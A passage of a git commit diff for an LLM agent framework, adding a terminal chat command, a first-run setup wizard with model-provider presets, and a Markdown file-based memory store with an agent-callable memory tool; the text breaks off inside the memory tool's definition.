feat(tools): add ShellTool + WebSearchTool, memory system, onboarding wizard, chat mode

- ShellTool: safe command execution with allowlist, blocked patterns (regex), timeout, output truncation
- WebSearchTool: multi-backend search with Tavily → Serper → DuckDuckGo Lite fallback
- MemoryTool: agent-callable tool with add/replace/remove/read actions
- MemoryStore/MemoryFile: file-based memory (SOUL.md, USER.md, MEMORY.md, DAILY.md)
- Onboarding wizard: provider selection, API key, model selection, agent personality
- Chat mode: interactive CLI with streaming, memory injection, tool integration
- Add 百炼 Coding Plan provider with 10 models
- 102 unit tests (34 new for ShellTool + WebSearchTool)
This commit is contained in:
chiguyong 2026-06-09 01:06:45 +08:00
parent 9874a4aac0
commit 045fecd4ce
15 changed files with 2620 additions and 0 deletions

375
src/agentkit/cli/chat.py Normal file
View File

@ -0,0 +1,375 @@
"""Chat command — interactive terminal chat with an Agent.
Runs a lightweight in-process server and opens a REPL-style chat session.
No external server or Docker needed.
Usage:
agentkit chat # Start chatting (auto-onboard if no config)
agentkit chat --model deepseek/deepseek-chat # Use specific model
"""
from __future__ import annotations
import asyncio
import os
from typing import Any
import typer
from rich import print as rprint
from rich.panel import Panel
from rich.prompt import Prompt
from rich.markdown import Markdown
from rich.live import Live
from rich.text import Text
from rich.console import Group
def chat(
model: str = typer.Option("default", "--model", "-m", help="LLM model to use (e.g. deepseek/deepseek-chat)"),
agent_name: str = typer.Option("default", "--agent", "-a", help="Agent name to chat with"),
config: str | None = typer.Option(None, "--config", "-c", help="Path to agentkit.yaml"),
system_prompt: str | None = typer.Option(None, "--system-prompt", "-s", help="Custom system prompt"),
no_stream: bool = typer.Option(False, "--no-stream", help="Disable token streaming"),
):
"""Start an interactive chat session with an Agent."""
asyncio.run(_chat_async(model, agent_name, config, system_prompt, no_stream))
async def _chat_async(
model: str,
agent_name: str,
config_arg: str | None,
system_prompt: str | None,
no_stream: bool,
) -> None:
"""Async implementation of the chat command."""
from agentkit.cli.onboarding import run_onboarding
from agentkit.server.config import ServerConfig, find_config_path
# ── Onboarding check ──────────────────────────────────────────
config_path = find_config_path(config_arg)
if config_path is None:
config_path = run_onboarding(config_arg=config_arg)
if config_path is None:
rprint("[red]Onboarding cancelled. Cannot start chat without configuration.[/red]")
raise typer.Exit(code=1)
# ── Load config ───────────────────────────────────────────────
rprint(f"[dim]Loading config from {config_path}[/dim]")
# Load .env
from pathlib import Path
dotenv = Path(config_path).parent / ".env"
if dotenv.exists():
_load_dotenv(str(dotenv))
server_config = ServerConfig.from_yaml(config_path)
# ── Build in-process components ───────────────────────────────
from agentkit.session.manager import SessionManager
from agentkit.session.store import InMemorySessionStore
from agentkit.session.models import MessageRole
from agentkit.core.react import ReActEngine
from agentkit.tools.base import Tool
from agentkit.memory.profile import MemoryStore
from agentkit.tools.memory_tool import MemoryTool
from agentkit.tools.shell import ShellTool
from agentkit.tools.web_search import WebSearchTool
from agentkit.tools.web_crawl import WebCrawlTool
# Build LLM Gateway
gateway = _build_gateway(server_config)
# Initialize memory store
memory_store = MemoryStore()
memory_store.ensure_defaults()
memory_snapshot = memory_store.load_all()
# Create session
session_manager = SessionManager(store=InMemorySessionStore())
session = await session_manager.create_session(agent_name=agent_name)
# Build tools list — all available tools for chat mode
search_api_keys = _extract_search_keys(server_config)
tools: list[Tool] = [
MemoryTool(memory_store=memory_store),
ShellTool(working_dir=os.getcwd()),
WebSearchTool(**search_api_keys),
WebCrawlTool(),
]
# Build system prompt — inject memory into system prompt
base_prompt = system_prompt or (
"You are a helpful AI assistant. "
"Remember the context of our conversation and refer back to earlier messages. "
"Respond clearly and concisely."
)
effective_system_prompt = memory_store.build_system_prompt(memory_snapshot, base_prompt)
# Resolve agent display name from SOUL.md
agent_display_name = memory_store.get_file("soul").read_section("身份") or agent_name
# Extract just the name (first line after "我是")
for prefix in ["我是", "我叫", "我的名字是"]:
if prefix in agent_display_name:
name_part = agent_display_name.split(prefix, 1)[1].strip()
# Take first meaningful token (before comma, period, etc.)
for sep in ["", "", "", ",", ".", " "]:
if sep in name_part:
name_part = name_part.split(sep)[0]
break
agent_display_name = name_part
break
# ── Welcome banner ────────────────────────────────────────────
effective_model = model if model != "default" else _resolve_default_model(server_config)
rprint(Panel(
f"[bold]AgentKit Chat[/bold]\n\n"
f" Model: [cyan]{effective_model}[/cyan]\n"
f" Agent: [cyan]{agent_display_name}[/cyan]\n"
f" Session: [dim]{session.session_id[:8]}...[/dim]\n\n"
f" Type your message and press Enter.\n"
f" [dim]/help[/dim] — Show commands\n"
f" [dim]/clear[/dim] — Clear conversation\n"
f" [dim]/model <name>[/dim] — Switch model\n"
f" [dim]/quit[/dim] — Exit chat",
title="AgentKit",
border_style="bright_blue",
))
# ── Chat loop ─────────────────────────────────────────────────
react_engine = ReActEngine(llm_gateway=gateway)
current_model = effective_model
conversation_had_messages = False
while True:
try:
user_input = Prompt.ask("\n[bold green]You[/bold green]")
except (EOFError, KeyboardInterrupt):
rprint("\n[dim]Goodbye![/dim]")
break
if not user_input.strip():
continue
# Handle commands
if user_input.startswith("/"):
cmd = user_input.strip().lower()
if cmd in ("/quit", "/q", "/exit"):
rprint("[dim]Goodbye![/dim]")
break
elif cmd == "/help":
_print_help()
continue
elif cmd == "/clear":
# Create a new session (memory files persist)
session = await session_manager.create_session(agent_name=agent_name)
rprint("[dim]Conversation cleared. New session started.[/dim]")
continue
elif cmd.startswith("/model "):
current_model = cmd.split(" ", 1)[1].strip()
rprint(f"[dim]Switched to model: {current_model}[/dim]")
continue
else:
rprint(f"[yellow]Unknown command: {cmd}[/yellow]")
continue
conversation_had_messages = True
# Append user message to session
await session_manager.append_message(
session_id=session.session_id,
role=MessageRole.USER,
content=user_input,
)
# Get full conversation history (includes all previous turns)
chat_messages = await session_manager.get_chat_messages(session.session_id)
# Print Agent label before streaming
rprint(f"\n[bold blue]{agent_display_name}[/bold blue]: ", end="")
# Execute Agent
try:
if no_stream:
# Non-streaming mode
result = await react_engine.execute(
messages=chat_messages,
tools=tools,
model=current_model,
agent_name=agent_name,
system_prompt=effective_system_prompt,
)
output = result.output if hasattr(result, "output") else str(result)
rprint(output)
await session_manager.append_message(
session_id=session.session_id,
role=MessageRole.ASSISTANT,
content=output,
agent_name=agent_name,
)
else:
# Streaming mode — Live displays under the "Agent:" label
full_content = ""
with Live(
Text(""),
refresh_per_second=15,
vertical_overflow="visible",
transient=False, # Keep final output on screen
) as live:
async for event in react_engine.execute_stream(
messages=chat_messages,
tools=tools,
model=current_model,
agent_name=agent_name,
system_prompt=effective_system_prompt,
):
if event.event_type == "token":
token = event.data.get("content", "")
full_content += token
live.update(Text(full_content))
elif event.event_type == "final_answer":
# Use final_answer output (may differ slightly from accumulated tokens)
full_content = event.data.get("output", full_content)
live.update(Markdown(full_content))
elif event.event_type == "tool_call":
tool_name = event.data.get("tool_name", "unknown")
live.update(Text(f"[calling tool: {tool_name}...]"))
elif event.event_type == "tool_result":
# After tool result, show accumulated content again
if full_content:
live.update(Text(full_content))
# Live already displayed the final content, no need to rprint again
await session_manager.append_message(
session_id=session.session_id,
role=MessageRole.ASSISTANT,
content=full_content,
agent_name=agent_name,
)
except Exception as e:
rprint(f"\n[red]Error: {e}[/red]")
# ── Session end: generate daily log ────────────────────────────
if conversation_had_messages:
try:
messages = await session_manager.get_messages(session.session_id)
if messages:
# Build a brief summary of the conversation
summary_parts = []
for msg in messages[-10:]: # Last 10 messages
role = msg.role.value if hasattr(msg.role, "value") else str(msg.role)
summary_parts.append(f"{role}: {msg.content[:100]}")
summary = "\n".join(summary_parts)
daily = memory_store.get_file("daily")
existing = daily.read()
new_entry = f"## 会话摘要\n{summary}"
if existing:
daily.write(f"{existing}\n\n{new_entry}")
else:
daily.write(new_entry)
# Archive old daily logs
memory_store.archive_old_dailies(keep_days=2)
except Exception:
pass # Daily log generation is best-effort
def _extract_search_keys(server_config: "ServerConfig") -> dict[str, str]:
"""Extract search API keys from server config environment."""
return {
"tavily_api_key": os.environ.get("TAVILY_API_KEY"),
"serper_api_key": os.environ.get("SERPER_API_KEY"),
}
def _build_gateway(server_config: "ServerConfig") -> "LLMGateway":
"""Build LLMGateway from ServerConfig, same logic as app.py."""
from agentkit.llm.gateway import LLMGateway
from agentkit.llm.providers.anthropic import AnthropicProvider
from agentkit.llm.providers.gemini import GeminiProvider
from agentkit.llm.providers.openai import OpenAICompatibleProvider
gateway = LLMGateway(config=server_config.llm_config)
for name, pconf in server_config.llm_config.providers.items():
if not pconf.api_key:
continue
try:
if pconf.type == "anthropic":
provider = AnthropicProvider(
api_key=pconf.api_key,
model=list(pconf.models.keys())[0] if pconf.models else "claude-sonnet-4-20250514",
max_tokens=pconf.max_tokens,
base_url=pconf.base_url or "https://api.anthropic.com",
timeout=pconf.timeout,
)
elif pconf.type == "gemini":
provider = GeminiProvider(
api_key=pconf.api_key,
model=list(pconf.models.keys())[0] if pconf.models else "gemini-2.0-flash",
max_output_tokens=pconf.max_tokens,
base_url=pconf.base_url or "https://generativelanguage.googleapis.com",
timeout=pconf.timeout,
)
else:
provider = OpenAICompatibleProvider(
api_key=pconf.api_key,
base_url=pconf.base_url,
)
gateway.register_provider(name, provider)
except Exception as e:
import logging
logging.getLogger(__name__).warning(f"Failed to register LLM provider '{name}': {e}")
return gateway
def _resolve_default_model(server_config: "ServerConfig") -> str:
"""Resolve the default model from config."""
if server_config.llm_config.model_aliases and "default" in server_config.llm_config.model_aliases:
return server_config.llm_config.model_aliases["default"]
# Fallback: first provider's first model
for name, pconf in server_config.llm_config.providers.items():
if pconf.api_key and pconf.models:
first_model = list(pconf.models.keys())[0]
return f"{name}/{first_model}"
return "default"
def _load_dotenv(dotenv_path: str) -> None:
"""Load .env file into environment."""
from pathlib import Path
path = Path(dotenv_path)
if not path.exists():
return
with open(path, encoding="utf-8") as f:
for line in f:
line = line.strip()
if not line or line.startswith("#"):
continue
if "=" not in line:
continue
key, _, value = line.partition("=")
key = key.strip()
value = value.strip().strip("\"'")
if key and key not in os.environ:
os.environ[key] = value
def _print_help() -> None:
"""Print chat command help."""
rprint(Panel(
"[bold]Chat Commands[/bold]\n\n"
" [cyan]/help[/cyan] — Show this help\n"
" [cyan]/clear[/cyan] — Clear conversation (new session)\n"
" [cyan]/model <name>[/cyan] — Switch LLM model\n"
" [cyan]/quit[/cyan] — Exit chat\n\n"
"[bold]Tips[/bold]\n\n"
" • Multi-line input: end a line with [cyan]\\[/cyan] to continue\n"
" • Your conversation is stored in memory for the session",
border_style="dim",
))

View File

@ -26,6 +26,9 @@ app.command(name="usage")(usage)
from agentkit.cli.pair import pair # noqa: E402 from agentkit.cli.pair import pair # noqa: E402
app.command(name="pair")(pair) app.command(name="pair")(pair)
from agentkit.cli.chat import chat # noqa: E402
app.command(name="chat")(chat)
@app.command() @app.command()
def serve( def serve(
@ -41,10 +44,22 @@ def serve(
import uvicorn import uvicorn
from agentkit.server.config import ServerConfig, find_config_path from agentkit.server.config import ServerConfig, find_config_path
from agentkit.cli.onboarding import needs_onboarding, run_onboarding
# Load .env file if present # Load .env file if present
config_path = find_config_path(config) config_path = find_config_path(config)
# Onboarding check
if config_path is None:
rprint("[yellow]No agentkit.yaml found.[/yellow]")
from rich.prompt import Confirm
if Confirm.ask("Would you like to run the setup wizard?", default=True):
config_path = run_onboarding(config_arg=config)
if config_path is None:
rprint("[red]Setup cancelled. Using defaults.[/red]")
else:
rprint("[dim]Using default configuration (no LLM providers).[/dim]")
if config_path: if config_path:
rprint(f"[green]Loading config from {config_path}[/green]") rprint(f"[green]Loading config from {config_path}[/green]")
server_config = ServerConfig.from_yaml(config_path) server_config = ServerConfig.from_yaml(config_path)

View File

@ -0,0 +1,316 @@
"""Onboarding flow — interactive first-time configuration wizard.
When no agentkit.yaml exists, this wizard guides the user through:
1. Choosing an LLM provider
2. Entering API key
3. Selecting a default model
4. Generating agentkit.yaml + .env
"""
from __future__ import annotations
import os
from pathlib import Path
from typing import Any
import yaml
from rich.panel import Panel
from rich.prompt import Prompt, Confirm
from rich import print as rprint
from agentkit.server.config import find_config_path
# ── Provider presets ──────────────────────────────────────────────────
PROVIDER_PRESETS: dict[str, dict[str, Any]] = {
"deepseek": {
"name": "DeepSeek",
"env_key": "DEEPSEEK_API_KEY",
"base_url": "https://api.deepseek.com/v1",
"type": "openai",
"models": {
"deepseek-chat": {"alias": "default"},
"deepseek-reasoner": {"alias": "reasoning"},
},
"default_model": "deepseek-chat",
},
"openai": {
"name": "OpenAI",
"env_key": "OPENAI_API_KEY",
"base_url": "https://api.openai.com/v1",
"type": "openai",
"models": {
"gpt-4o": {"alias": "default"},
"gpt-4o-mini": {"alias": "fast"},
},
"default_model": "gpt-4o",
},
"bailian-coding": {
"name": "百炼 Coding Plan",
"env_key": "DASHSCOPE_API_KEY",
"base_url": "https://coding.dashscope.aliyuncs.com/v1",
"type": "openai",
"models": {
"qwen3.7-plus": {"alias": "default"},
"qwen3.6-plus": {},
"qwen3.5-plus": {},
"qwen3-max-2026-01-23": {},
"qwen3-coder-plus": {"alias": "coder"},
"qwen3-coder-next": {},
"kimi-k2.5": {},
"glm-5": {},
"glm-4.7": {},
"MiniMax-M2.5": {},
},
"default_model": "qwen3.7-plus",
},
"qwen": {
"name": "通义千问 (Qwen/DashScope)",
"env_key": "DASHSCOPE_API_KEY",
"base_url": "https://dashscope.aliyuncs.com/compatible-mode/v1",
"type": "openai",
"models": {
"qwen-plus": {"alias": "default"},
"qwen-turbo": {"alias": "fast"},
},
"default_model": "qwen-plus",
},
"doubao": {
"name": "豆包 (Doubao)",
"env_key": "DOUBAO_API_KEY",
"base_url": "https://ark.cn-beijing.volces.com/api/v3",
"type": "openai",
"models": {
"doubao-pro-32k": {"alias": "default"},
},
"default_model": "doubao-pro-32k",
},
"gemini": {
"name": "Google Gemini",
"env_key": "GEMINI_API_KEY",
"base_url": "https://generativelanguage.googleapis.com",
"type": "gemini",
"models": {
"gemini-2.0-flash": {"alias": "default"},
},
"default_model": "gemini-2.0-flash",
},
"anthropic": {
"name": "Anthropic Claude",
"env_key": "ANTHROPIC_API_KEY",
"base_url": "https://api.anthropic.com",
"type": "anthropic",
"models": {
"claude-sonnet-4-20250514": {"alias": "default"},
},
"default_model": "claude-sonnet-4-20250514",
},
}
def needs_onboarding(config_arg: str | None = None) -> bool:
"""Check if onboarding is needed (no config file found)."""
return find_config_path(config_arg) is None
def run_onboarding(
output_dir: str = ".",
config_arg: str | None = None,
) -> str | None:
"""Run the interactive onboarding wizard.
Returns:
Path to the generated config file, or None if cancelled.
"""
rprint(Panel(
"[bold]Welcome to AgentKit![/bold]\n\n"
"No configuration file found. Let's set up your first Agent.\n"
"This will create [cyan]agentkit.yaml[/cyan] and [cyan].env[/cyan] for you.",
title="AgentKit Setup",
border_style="bright_blue",
))
output_path = Path(output_dir).resolve()
output_path.mkdir(parents=True, exist_ok=True)
# ── Step 1: Choose LLM provider ──────────────────────────────
rprint("\n[bold]Step 1: Choose your LLM provider[/bold]")
provider_keys = list(PROVIDER_PRESETS.keys())
for i, key in enumerate(provider_keys, 1):
preset = PROVIDER_PRESETS[key]
rprint(f" [cyan]{i}[/cyan]. {preset['name']}")
choice = Prompt.ask(
"\nSelect a provider",
choices=[str(i) for i in range(1, len(provider_keys) + 1)],
default="1",
)
selected_key = provider_keys[int(choice) - 1]
preset = PROVIDER_PRESETS[selected_key]
rprint(f"\n[green]Selected: {preset['name']}[/green]")
# ── Step 2: Enter API key ─────────────────────────────────────
rprint(f"\n[bold]Step 2: Enter your API key[/bold]")
rprint(f"You can get one from the {preset['name']} dashboard.")
api_key = Prompt.ask(
f" {preset['env_key']}",
password=True,
)
if not api_key.strip():
rprint("[red]API key is required. Onboarding cancelled.[/red]")
return None
# ── Step 2b: Select default model ────────────────────────────
available_models = list(preset["models"].keys())
if len(available_models) > 1:
rprint(f"\n[bold]Step 2b: Select your default model[/bold]")
for i, model in enumerate(available_models, 1):
alias = preset["models"][model].get("alias", "")
alias_str = f" [dim]({alias})[/dim]" if alias else ""
recommended = " [green]← recommended[/green]" if model == preset.get("default_model") else ""
rprint(f" [cyan]{i}[/cyan]. {model}{alias_str}{recommended}")
model_choice = Prompt.ask(
"Select default model",
choices=[str(i) for i in range(1, len(available_models) + 1)],
default=str(available_models.index(preset.get("default_model", available_models[0])) + 1),
)
selected_model = available_models[int(model_choice) - 1]
# Rebuild models dict: selected model gets "default" alias
updated_models: dict[str, Any] = {}
for model, conf in preset["models"].items():
if model == selected_model:
updated_models[model] = {**conf, "alias": "default"}
else:
# Remove "default" alias from other models
updated_models[model] = {k: v for k, v in conf.items() if k != "alias" or v != "default"}
preset = {**preset, "models": updated_models}
rprint(f"[green]Selected: {selected_model}[/green]")
else:
selected_model = available_models[0]
# ── Step 3: Optional — add a second provider ─────────────────
env_vars: dict[str, str] = {preset["env_key"]: api_key.strip()}
providers_config: dict[str, Any] = {
selected_key: {
"api_key": f"${{{preset['env_key']}}}",
"base_url": preset["base_url"],
"type": preset["type"],
"models": preset["models"],
}
}
model_aliases: dict[str, str] = {alias: f"{selected_key}/{model}" for model, conf in preset["models"].items() if (alias := conf.get("alias"))}
if Confirm.ask("\nWould you like to add a second LLM provider (for fallback)?", default=False):
remaining = [k for k in provider_keys if k != selected_key]
for i, key in enumerate(remaining, 1):
rprint(f" [cyan]{i}[/cyan]. {PROVIDER_PRESETS[key]['name']}")
choice2 = Prompt.ask(
"Select second provider (or press Enter to skip)",
choices=[str(i) for i in range(1, len(remaining) + 1)] + [""],
default="",
)
if choice2:
key2 = remaining[int(choice2) - 1]
preset2 = PROVIDER_PRESETS[key2]
api_key2 = Prompt.ask(f" {preset2['env_key']}", password=True)
if api_key2.strip():
env_vars[preset2["env_key"]] = api_key2.strip()
providers_config[key2] = {
"api_key": f"${{{preset2['env_key']}}}",
"base_url": preset2["base_url"],
"type": preset2["type"],
"models": preset2["models"],
}
for model, conf in preset2["models"].items():
alias = conf.get("alias")
if alias and alias not in model_aliases:
model_aliases[alias] = f"{key2}/{model}"
# ── Step 4: Generate config files ─────────────────────────────
rprint("\n[bold]Step 3: Generating configuration...[/bold]")
config = {
"server": {
"host": "0.0.0.0",
"port": 8001,
"workers": 1,
"rate_limit": 60,
},
"llm": {
"providers": providers_config,
"model_aliases": model_aliases,
},
"session": {
"backend": "memory",
},
"bus": {
"backend": "memory",
},
"task_store": {
"backend": "memory",
},
"skills": {
"auto_discover": True,
"paths": ["./skills"],
},
"logging": {
"level": "INFO",
"format": "text",
},
}
# Write agentkit.yaml
config_path = output_path / "agentkit.yaml"
with open(config_path, "w", encoding="utf-8") as f:
yaml.dump(config, f, default_flow_style=False, allow_unicode=True, sort_keys=False)
rprint(f" [green]Created:[/green] {config_path}")
# Write .env
env_path = output_path / ".env"
env_lines = [f"{k}={v}" for k, v in env_vars.items()]
with open(env_path, "w", encoding="utf-8") as f:
f.write("# AgentKit Environment Variables\n")
f.write("# Generated by onboarding wizard\n\n")
f.write("\n".join(env_lines) + "\n")
rprint(f" [green]Created:[/green] {env_path}")
# ── Step 4: Agent personality (optional) ──────────────────────
rprint("\n[bold]Step 4: Customize your Agent (optional)[/bold]")
rprint(" Press Enter to use defaults, or type your preferences.")
agent_name = Prompt.ask(" Agent name", default="AgentKit")
personality = Prompt.ask(" Personality", default="专业、友好、注重细节")
speaking_style = Prompt.ask(" Speaking style", default="简洁清晰")
# Create SOUL.md
from agentkit.memory.profile import MemoryStore
memory_store = MemoryStore(base_dir=Path.home() / ".agentkit")
soul_content = f"""## 身份
我是{agent_name}一个专业的 AI 助手
## 性格
{personality}
## 说话方式
{speaking_style}
## 做事准则
- 准确回答用户问题
- 主动记住用户提到的偏好和信息
- 不确定时坦诚说明
"""
memory_store.get_file("soul").write(soul_content.strip())
rprint(f" [green]Created:[/green] ~/.agentkit/SOUL.md")
rprint(Panel(
"[bold green]Setup complete![/bold green]\n\n"
"You can now run:\n"
" [cyan]agentkit chat[/cyan] — Start chatting with your Agent\n"
" [cyan]agentkit serve[/cyan] — Start the API server",
border_style="green",
))
return str(config_path)

View File

@ -14,6 +14,7 @@ from agentkit.memory.query_transformer import (
TransformedQuery, TransformedQuery,
create_query_transformer, create_query_transformer,
) )
from agentkit.memory.profile import MemoryFile, MemoryStore, MemorySnapshot
__all__ = [ __all__ = [
"Memory", "Memory",
@ -29,4 +30,7 @@ __all__ = [
"NoOpQueryTransformer", "NoOpQueryTransformer",
"TransformedQuery", "TransformedQuery",
"create_query_transformer", "create_query_transformer",
"MemoryFile",
"MemoryStore",
"MemorySnapshot",
] ]

View File

@ -0,0 +1,294 @@
"""分层记忆系统 — SOUL/USER/MEMORY/DAILY 文件管理.
参考 Hermes/OpenClaw 架构实现 Agent 人格用户档案工作笔记
日志的持久化存储与 system prompt 注入
"""
from __future__ import annotations
import re
from dataclasses import dataclass, field
from datetime import datetime, timezone
from pathlib import Path
from typing import Any
class MemoryFile:
"""单个记忆文件的管理器,支持 section 级别 CRUD 和容量控制.
文件格式为 Markdown使用 `## Section` 组织内容::
## 身份
我是小王一个专业的 AI 助手
## 性格
友好耐心注重细节
"""
def __init__(self, path: Path, char_budget: int | None = None):
self.path = Path(path)
self.char_budget = char_budget
def read(self) -> str:
"""读取整个文件内容,文件不存在返回空字符串."""
if not self.path.exists():
return ""
return self.path.read_text(encoding="utf-8")
def write(self, content: str) -> None:
"""写入内容,自动创建父目录,超容量时自动裁剪."""
self.path.parent.mkdir(parents=True, exist_ok=True)
self.path.write_text(content, encoding="utf-8")
if self.char_budget and len(content) > self.char_budget:
self.trim_to_budget()
def read_section(self, name: str) -> str:
"""读取指定 section 的内容(不含标题行)."""
content = self.read()
if not content:
return ""
# 匹配 ## name 后面的内容,直到下一个 ## 或文件末尾
pattern = rf"^## {re.escape(name)}\s*\n(.*?)(?=^## |\Z)"
match = re.search(pattern, content, re.MULTILINE | re.DOTALL)
if match:
return match.group(1).strip()
return ""
def add_section(self, name: str, content: str) -> None:
"""追加内容到指定 section不存在则创建."""
existing = self.read()
section_content = self.read_section(name)
if section_content:
# 追加到已有 section
old_text = section_content
new_text = f"{old_text}\n{content}"
self.replace_section(name, old_text, new_text)
else:
# 创建新 section
new_section = f"\n## {name}\n{content}"
if existing and not existing.endswith("\n"):
new_section = "\n" + new_section
self.write(existing + new_section)
def replace_section(self, name: str, old_text: str, new_text: str) -> bool:
"""替换 section 内的文本,返回是否成功."""
section_content = self.read_section(name)
if old_text not in section_content:
return False
full_content = self.read()
# 替换 section 内的文本
pattern = rf"(^## {re.escape(name)}\s*\n)(.*?)(?=^## |\Z)"
match = re.search(pattern, full_content, re.MULTILINE | re.DOTALL)
if not match:
return False
original_section_body = match.group(2)
new_section_body = original_section_body.replace(old_text, new_text, 1)
updated = full_content[: match.start(2)] + new_section_body + full_content[match.end(2) :]
self.write(updated)
return True
def remove_section(self, name: str) -> None:
"""删除整个 section含标题行."""
content = self.read()
if not content:
return
pattern = rf"^## {re.escape(name)}\s*\n.*?(?=^## |\Z)"
new_content = re.sub(pattern, "", content, flags=re.MULTILINE | re.DOTALL).strip()
self.write(new_content)
def list_sections(self) -> list[str]:
"""列出所有 section 名称."""
content = self.read()
if not content:
return []
return re.findall(r"^## (.+)$", content, re.MULTILINE)
def trim_to_budget(self) -> None:
"""裁剪内容到容量上限,优先保留前面的 section."""
if not self.char_budget:
return
content = self.read()
if len(content) <= self.char_budget:
return
# 从末尾裁剪,保留前面的 section
self.write(content[: self.char_budget])
@dataclass
class MemorySnapshot:
"""一次加载的所有记忆文件快照."""
soul: str = ""
user: str = ""
memory: str = ""
daily: str = ""
total_chars: int = 0
def is_empty(self) -> bool:
return not any([self.soul, self.user, self.memory, self.daily])
# 容量上限常量(字符数)
SOUL_BUDGET = 2000
USER_BUDGET = 1400
MEMORY_BUDGET = 2200
DAILY_BUDGET = 1000 # 每天日志上限
# 默认 SOUL.md 内容
DEFAULT_SOUL = """## 身份
我是 AgentKit一个专业的 AI 助手
## 性格
专业友好注重细节
## 说话方式
简洁清晰偶尔使用比喻帮助理解
## 做事准则
- 准确回答用户问题
- 主动记住用户提到的偏好和信息
- 不确定时坦诚说明
"""
class MemoryStore:
"""管理 SOUL/USER/MEMORY/DAILY 四类记忆文件.
存储路径::
base_dir/
SOUL.md
memories/
USER.md
MEMORY.md
daily/
2026-06-07.md
2026-06-08.md
"""
def __init__(self, base_dir: Path | str | None = None):
if base_dir is None:
base_dir = Path.home() / ".agentkit"
self.base_dir = Path(base_dir)
self.base_dir.mkdir(parents=True, exist_ok=True)
# 初始化四个 MemoryFile
self._soul = MemoryFile(self.base_dir / "SOUL.md", char_budget=SOUL_BUDGET)
self._user = MemoryFile(self.base_dir / "memories" / "USER.md", char_budget=USER_BUDGET)
self._memory = MemoryFile(self.base_dir / "memories" / "MEMORY.md", char_budget=MEMORY_BUDGET)
self._daily_dir = self.base_dir / "memories" / "daily"
self._daily_dir.mkdir(parents=True, exist_ok=True)
def get_file(self, file_key: str) -> MemoryFile:
"""获取指定类型的 MemoryFile.
Args:
file_key: "soul" | "user" | "memory" | "daily"
"""
mapping = {
"soul": self._soul,
"user": self._user,
"memory": self._memory,
}
if file_key in mapping:
return mapping[file_key]
if file_key == "daily":
# daily 返回今天的日志文件
today = datetime.now(timezone.utc).strftime("%Y-%m-%d")
return MemoryFile(self._daily_dir / f"{today}.md", char_budget=DAILY_BUDGET)
raise ValueError(f"Invalid file_key: {file_key}. Must be soul/user/memory/daily")
def ensure_defaults(self) -> None:
"""首次运行时创建默认 SOUL.md."""
if not self._soul.read():
self._soul.write(DEFAULT_SOUL.strip())
def load_all(self) -> MemorySnapshot:
"""加载所有记忆文件."""
soul = self._soul.read()
user = self._user.read()
memory = self._memory.read()
daily = self.load_daily_logs()
total = len(soul) + len(user) + len(memory) + len(daily)
return MemorySnapshot(
soul=soul,
user=user,
memory=memory,
daily=daily,
total_chars=total,
)
def load_daily_logs(self, days: int = 2) -> str:
"""加载最近 N 天的日志."""
parts: list[str] = []
for i in range(days):
from datetime import timedelta
date = datetime.now(timezone.utc) - timedelta(days=i)
filename = f"{date.strftime('%Y-%m-%d')}.md"
daily_file = MemoryFile(self._daily_dir / filename)
content = daily_file.read()
if content:
parts.append(f"### {date.strftime('%Y-%m-%d')}\n{content}")
return "\n\n".join(parts)
def archive_old_dailies(self, keep_days: int = 2) -> int:
"""归档超过 N 天的日志(删除旧文件)."""
from datetime import timedelta
count = 0
cutoff = datetime.now(timezone.utc) - timedelta(days=keep_days)
if not self._daily_dir.exists():
return 0
for f in self._daily_dir.glob("*.md"):
# 从文件名解析日期
try:
date_str = f.stem # e.g. "2026-06-07"
file_date = datetime.strptime(date_str, "%Y-%m-%d").replace(tzinfo=timezone.utc)
if file_date < cutoff:
f.unlink()
count += 1
except ValueError:
continue
return count
def build_system_prompt(self, snapshot: MemorySnapshot, base_prompt: str = "") -> str:
"""将记忆注入 system prompt.
格式::
<agent-identity>
[SOUL.md content]
</agent-identity>
<user-profile>
[USER.md content]
</user-profile>
<agent-notes>
[MEMORY.md content]
</agent-notes>
<recent-activity>
[DAILY.md content]
</recent-activity>
[base_prompt]
"""
parts: list[str] = []
if snapshot.soul:
parts.append(f"<agent-identity>\n{snapshot.soul}\n</agent-identity>")
if snapshot.user:
parts.append(f"<user-profile>\n{snapshot.user}\n</user-profile>")
if snapshot.memory:
parts.append(f"<agent-notes>\n{snapshot.memory}\n</agent-notes>")
if snapshot.daily:
parts.append(f"<recent-activity>\n{snapshot.daily}\n</recent-activity>")
if base_prompt:
parts.append(base_prompt)
return "\n\n".join(parts) if parts else base_prompt

View File

@ -10,6 +10,9 @@ from agentkit.tools.web_crawl import WebCrawlTool
from agentkit.tools.schema_tools import SchemaExtractTool, SchemaGenerateTool from agentkit.tools.schema_tools import SchemaExtractTool, SchemaGenerateTool
from agentkit.tools.baidu_search import BaiduSearchTool from agentkit.tools.baidu_search import BaiduSearchTool
from agentkit.tools.ask_human import AskHumanTool from agentkit.tools.ask_human import AskHumanTool
from agentkit.tools.memory_tool import MemoryTool
from agentkit.tools.shell import ShellTool
from agentkit.tools.web_search import WebSearchTool
# Conditional import: HeadroomRetrieveTool requires HeadroomCompressor # Conditional import: HeadroomRetrieveTool requires HeadroomCompressor
try: try:
@ -31,5 +34,8 @@ __all__ = [
"SchemaGenerateTool", "SchemaGenerateTool",
"BaiduSearchTool", "BaiduSearchTool",
"AskHumanTool", "AskHumanTool",
"MemoryTool",
"ShellTool",
"WebSearchTool",
"HeadroomRetrieveTool", "HeadroomRetrieveTool",
] ]

View File

@ -0,0 +1,117 @@
"""MemoryTool — Agent 可在对话中读写记忆的工具.
操作:
- add: 追加内容到指定 section
- replace: 替换 section 内的文本
- remove: 删除整个 section
- read: 读取文件内容
file 参数: soul | user | memory | daily
"""
from __future__ import annotations
from typing import Any
from agentkit.memory.profile import MemoryStore
from agentkit.tools.base import Tool
VALID_FILES = {"soul", "user", "memory", "daily"}
VALID_ACTIONS = {"add", "replace", "remove", "read"}
class MemoryTool(Tool):
"""Agent 可调用的记忆操作工具.
Agent 在对话中读写 SOUL/USER/MEMORY/DAILY 记忆文件
"""
def __init__(self, memory_store: MemoryStore):
super().__init__(
name="memory",
description="Read and write persistent memory files. Use to remember user preferences, project info, and notes across sessions.",
input_schema={
"type": "object",
"properties": {
"action": {
"type": "string",
"enum": list(VALID_ACTIONS),
"description": "Operation: add, replace, remove, read",
},
"file": {
"type": "string",
"enum": list(VALID_FILES),
"description": "Memory file: soul (agent identity), user (user profile), memory (work notes), daily (today's log)",
},
"section": {
"type": "string",
"description": "Section name within the file (e.g. '项目信息', '偏好')",
},
"content": {
"type": "string",
"description": "Content to add or new text for replace",
},
"old_text": {
"type": "string",
"description": "Text to find for replace action",
},
"new_text": {
